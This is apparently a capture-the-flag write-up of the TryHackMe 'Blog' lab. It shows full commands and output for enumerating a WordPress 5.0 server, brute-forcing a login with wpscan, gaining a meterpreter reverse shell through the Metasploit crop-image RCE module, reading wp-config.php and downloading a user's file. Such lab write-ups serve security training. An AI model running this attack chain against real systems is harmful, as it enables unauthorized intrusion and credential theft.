Blog
About The Room
Billy Joel made a Wordpress blog!
- Url: https://tryhackme.com/room/blog
- Creator: Nameless0ne
- Difficulty: Medium
First Thing First
We should add (IP) blog.thm to our /etc/hosts file, so that it runs smoothly via AWS
1
2
3
┌──(uber㉿uber)-[~/Desktop/THM/BillyBlog]
└─$ cat /etc/hosts | grep blog
10.10.43.206 blog.thm
Reconnaissance
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
nmap -v -sC -sV 10.10.43.206
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-01 17:42 IST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:42
Completed NSE at 17:42, 0.00s elapsed
Initiating NSE at 17:42
Completed NSE at 17:42, 0.00s elapsed
Initiating NSE at 17:42
Completed NSE at 17:42, 0.00s elapsed
Initiating Ping Scan at 17:42
Scanning 10.10.43.206 [2 ports]
Completed Ping Scan at 17:42, 0.17s elapsed (1 total hosts)
Initiating Connect Scan at 17:42
Scanning blog.thm (10.10.43.206) [1000 ports]
Discovered open port 445/tcp on 10.10.43.206
Discovered open port 139/tcp on 10.10.43.206
Discovered open port 22/tcp on 10.10.43.206
Discovered open port 80/tcp on 10.10.43.206
Increasing send delay for 10.10.43.206 from 0 to 5 due to 55 out of 183 dropped probes since last increase.
Completed Connect Scan at 17:42, 20.72s elapsed (1000 total ports)
Initiating Service scan at 17:42
Scanning 4 services on blog.thm (10.10.43.206)
Completed Service scan at 17:42, 11.70s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.43.206.
Initiating NSE at 17:42
Completed NSE at 17:42, 6.23s elapsed
Initiating NSE at 17:42
Completed NSE at 17:42, 0.74s elapsed
Initiating NSE at 17:42
Completed NSE at 17:42, 0.00s elapsed
Nmap scan report for blog.thm (10.10.43.206)
Host is up (0.17s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
| 256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
|_ 256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.0
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Billy Joel's IT Blog – The IT blog
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2022-05-01T12:12:38
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: blog
| NetBIOS computer name: BLOG\x00
| Domain name: \x00
| FQDN: blog
|_ System time: 2022-05-01T12:12:38+00:00
| nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| BLOG<00> Flags: <unique><active>
| BLOG<03> Flags: <unique><active>
| BLOG<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
NSE: Script Post-scanning.
Initiating NSE at 17:42
Completed NSE at 17:42, 0.00s elapsed
Initiating NSE at 17:42
Completed NSE at 17:42, 0.00s elapsed
Initiating NSE at 17:42
Completed NSE at 17:42, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.07 seconds
oooh, we have port 139 open and we now know that the wordpress version being used is 5.0 (vulnerable!). Nice.
Also, let’s check out port 80, by simply visiting 10.10.43.206.
On the first glance, there seems nothing of interest, even source code does not have anything juicy as such, it’s just a simple blog. But we do get two names Billy Joel and Karen Wheeler. Also, on scrolling down, we are presented with Log in which, as usual is wordpress’s wp-login.php.
Gobuster
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
gobuster dir -u http://10.10.43.206/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.43.206/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/05/01 17:46:56 Starting gobuster in directory enumeration mode
===============================================================
/rss (Status: 301) [Size: 0] [--> http://10.10.43.206/feed/]
/login (Status: 302) [Size: 0] [--> http://blog.thm/wp-login.php]
/0 (Status: 301) [Size: 0] [--> http://10.10.43.206/0/]
/feed (Status: 301) [Size: 0] [--> http://10.10.43.206/feed/]
/atom (Status: 301) [Size: 0] [--> http://10.10.43.206/feed/atom/]
/wp-content (Status: 301) [Size: 317] [--> http://10.10.43.206/wp-content/]
/admin (Status: 302) [Size: 0] [--> http://blog.thm/wp-admin/]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.43.206/feed/]
/wp-includes (Status: 301) [Size: 318] [--> http://10.10.43.206/wp-includes/]
/rdf (Status: 301) [Size: 0] [--> http://10.10.43.206/feed/rdf/]
/page1 (Status: 301) [Size: 0] [--> http://10.10.43.206/]
/' (Status: 301) [Size: 0] [--> http://10.10.43.206/]
/dashboard (Status: 302) [Size: 0] [--> http://blog.thm/wp-admin/]
/%20 (Status: 301) [Size: 0] [--> http://10.10.43.206/]
/2020 (Status: 301) [Size: 0] [--> http://10.10.43.206/2020/]
/wp-admin (Status: 301) [Size: 315] [--> http://10.10.43.206/wp-admin/]
No important info here. Moving on..
Nikto
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
nikto -h 10.10.43.206
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.43.206
+ Target Hostname: 10.10.43.206
+ Target Port: 80
+ Start Time: 2022-05-01 17:48:09 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://blog.thm/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /wp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /wordpresswp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /: A Wordpress installation was found.
+ /wordpress: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
+ 7893 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time: 2022-05-01 18:29:10 (GMT5.5) (2461 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Moving on again..
Enum4linux
Enum4linux is a tool for enumerating information from Windows and Samba systems.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
enum4linux 10.10.43.206
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ )
=========================================( Target Information )=========================================
Target ........... 10.10.43.206
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.43.206 )============================
[+] Got domain/workgroup name: WORKGROUP
================================( Nbtstat Information for 10.10.43.206 )================================
Looking up status of 10.10.43.206
BLOG <00> - B <ACTIVE> Workstation Service
BLOG <03> - B <ACTIVE> Messenger Service
BLOG <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
===================================( Session Check on 10.10.43.206 )===================================
[+] Server 10.10.43.206 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.43.206 )================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
===================================( OS information on 10.10.43.206 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.43.206 from srvinfo:
BLOG Wk Sv PrQ Unx NT SNT blog server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
=======================================( Users on 10.10.43.206 )=======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
=================================( Share Enumeration on 10.10.43.206 )=================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
BillySMB Disk Billy's local SMB Share
IPC$ IPC IPC Service (blog server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BLOG
[+] Attempting to map shares on 10.10.43.206
//10.10.43.206/print$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.43.206/BillySMB Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.43.206/IPC$ Mapping: N/A Listing: N/A Writing: N/A
============================( Password Policy Information for 10.10.43.206 )============================
[+] Attaching to 10.10.43.206 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BLOG
[+] Builtin
[+] Password Info for Domain: BLOG
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
=======================================( Groups on 10.10.43.206 )=======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 10.10.43.206 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-21-3132497411-2525593288-1635041108 and logon username '', password ''
S-1-5-21-3132497411-2525593288-1635041108-501 BLOG\nobody (Local User)
S-1-5-21-3132497411-2525593288-1635041108-513 BLOG\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\bjoel (Local User)
S-1-22-1-1001 Unix User\smb (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
===============================( Getting printer info for 10.10.43.206 )===============================
No printers returned.
Now we are getting somewhere..! We have BillySMB local share (For knowing the permissions allowed, we’ll run smbmap) and we got an username bjoel..!
smbmap
SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents etc.
1
2
3
4
5
6
7
8
smbmap -H 10.10.43.206
[+] Guest session IP: 10.10.43.206:445 Name: blog.thm
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
BillySMB READ, WRITE Billy's local SMB Share
IPC$ NO ACCESS IPC Service (blog server (Samba, Ubuntu))
Okay! We have Read-Write access on this local SMB share. Cool..!
smbclient
SMBClient communicates with a LAN Manager server, offering an interface similar to that of the ftp program.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
──(uber㉿uber)-[~/Desktop/THM/BillyBlog]
└─$ smbclient //10.10.43.206/BillySMB
Password for [WORKGROUP\uber]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun May 1 17:49:34 2022
.. D 0 Tue May 26 23:28:23 2020
Alice-White-Rabbit.jpg N 33378 Tue May 26 23:47:01 2020
tswift.mp4 N 1236733 Tue May 26 23:43:45 2020
check-this.png N 3082 Tue May 26 23:43:43 2020
15413192 blocks of size 1024. 9787876 blocks available
smb: \>
Hmmm.. what kind of files are these?? Let’s check them by fetching them into our system.
1
2
3
4
5
6
7
smb: \> get Alice-White-Rabbit.jpg
getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (34.6 KiloBytes/sec) (average 34.6 KiloBytes/sec)
smb: \> get tswift.mp4
getting file \tswift.mp4 of size 1236733 as tswift.mp4 (212.7 KiloBytes/sec) (average 187.4 KiloBytes/sec)
smb: \> get check-this.png
getting file \check-this.png of size 3082 as check-this.png (4.4 KiloBytes/sec) (average 170.2 KiloBytes/sec)
smb: \>
Man..! hahhah the tswift.mp4 made me kinda lol, the check-this.png is a qr code which leads us to a youtube song video and the Alice-White-Rabbit.jpg looks like just a normal picture at first glance
But, I have a feeling that the whole rabbit hole thing doesn’t fit right. We should look this file for any hidden steganography.
steghide
1
2
3
4
5
6
steghide extract -sf Alice-White-Rabbit.jpg -v
Enter passphrase:
reading stego file "Alice-White-Rabbit.jpg"... done
extracting data... done
checking crc32 checksum... ok
writing extracted data to "rabbit_hole.txt"... done
Hmmm..this file name really doesn’t look good..hahah. Let’s check it out.
1
2
cat rabbit_hole.txt
You've found yourself in a rabbit hole, friend.
Man.. What a rabbit hole we fell into..! lol
wpscan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
wpscan --url 10.10.43.206 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.43.206/ [10.10.43.206]
[+] Started:
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.10.43.206/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.43.206/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.43.206/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.43.206/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.43.206/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.43.206/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.43.206/, Match: 'WordPress 5.0'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <========================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] bjoel
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.10.43.206/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] kwheel
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.10.43.206/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Karen Wheeler
| Found By: Rss Generator (Aggressive Detection)
[+] Billy Joel
| Found By: Rss Generator (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun May 1 18:58:28 2022
[+] Requests Done: 31
[+] Cached Requests: 33
[+] Data Sent: 8.067 KB
[+] Data Received: 349.2 KB
[+] Memory used: 157.012 MB
[+] Elapsed time: 00:00:07
We got another username kwheel. Nice..!
hydra
Hydra will not work as intended with both the usernames, advised to skip.
wpscan for password
Try with kwheel username as getting the password for bjoel is not working properly.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
┌──(uber㉿uber)-[~/Desktop/THM/BillyBlog]
└─$ wpscan --url 10.10.43.206 -U 'kwheel' -P /home/uber/Downloads/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.43.206/ [10.10.43.206]
[+] Started:
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.10.43.206/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.43.206/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.43.206/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.43.206/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.43.206/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.43.206/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.43.206/, Match: 'WordPress 5.0'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:07 <=======================================================> (137 / 137) 100.00% Time: 00:00:07
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - kwheel / redacted
[!] Valid Combinations Found:
| Username: kwheel, Password: redacted
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished:
[+] Requests Done: 3032
[+] Cached Requests: 5
[+] Data Sent: 1.489 MB
[+] Data Received: 1.878 MB
[+] Memory used: 226.121 MB
[+] Elapsed time: 00:04:30
Got the password..!
cve
We know that the wordpress version is 5.0 and it is vulnerable, so we’ll search for an exploit which will help us in moving further.
Getting Shell
msfconsole
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
┌──(uber㉿uber)-[~/Desktop/THM/BillyBlog]
└─$ sudo msfconsole
[sudo] password for uber:
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.1.39-dev ]
+ -- --=[ 2214 exploits - 1171 auxiliary - 396 post ]
+ -- --=[ 614 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
msf6 > search crop-image
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_crop_rce 2019-02-19 excellent Yes WordPress Crop-image Shell Upload
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_crop_rce
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS 10.10.43.206
RHOSTS => 10.10.43.206
msf6 exploit(multi/http/wp_crop_rce) > options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.43.206 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploi
t
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(multi/http/wp_crop_rce) > set PASSWORD redacted
PASSWORD => redacted
msf6 exploit(multi/http/wp_crop_rce) > set USERNAME kwheel
USERNAME => kwheel
msf6 exploit(multi/http/wp_crop_rce) > set LHOST 10.9.2.90
LHOST => 10.9.2.90
msf6 exploit(multi/http/wp_crop_rce) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/http/wp_crop_rce) > run
[*] Started reverse TCP handler on 10.9.2.90:1234
[*] Authenticating with WordPress using kwheel:redacted...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (39860 bytes) to 10.10.43.206
[*] Attempting to clean up files...
[*] Meterpreter session 1 opened (10.9.2.90:1234 -> 10.10.43.206:57986 ) at
meterpreter >
We got a meterpreter shell..nice..!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
meterpreter > cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
/* Custom */
/*
define('WP_HOME', '/');
define('WP_SITEURL', '/'); */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'blog');
/** MySQL database username */
define('DB_USER', 'wordpressuser');
/** MySQL database password */
define('DB_PASSWORD', 'redacted');
/** MySQL hostname */
define('DB_HOST', 'localhost');
...
Voila, we got the password for mr. bjoel also. Now we can easily login in his wordpress account.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
meterpreter > cd home
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040755/rwxr-xr-x 4096 dir 2020-05-27 01:38:48 +0530 bjoel
meterpreter > cd bjoel
meterpreter > ls
Listing: /home/bjoel
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
020666/rw-rw-rw- 0 cha 2022-05-01 17:23:21 +0530 .bash_history
100644/rw-r--r-- 220 fil 2018-04-05 00:00:26 +0530 .bash_logout
100644/rw-r--r-- 3771 fil 2018-04-05 00:00:26 +0530 .bashrc
040700/rwx------ 4096 dir 2020-05-25 18:45:58 +0530 .cache
040700/rwx------ 4096 dir 2020-05-25 18:45:58 +0530 .gnupg
100644/rw-r--r-- 807 fil 2018-04-05 00:00:26 +0530 .profile
100644/rw-r--r-- 0 fil 2020-05-25 18:46:22 +0530 .sudo_as_admin_successful
100644/rw-r--r-- 69106 fil 2020-05-27 00:03:24 +0530 Billy_Joel_Termination_May20-2020.pdf
100644/rw-r--r-- 57 fil 2020-05-27 01:38:47 +0530 user.txt
meterpreter > cat user.txt
You won't find what you're looking for here.
TRY HARDER
meterpreter > download Billy_Joel_Termination_May20-2020.pdf
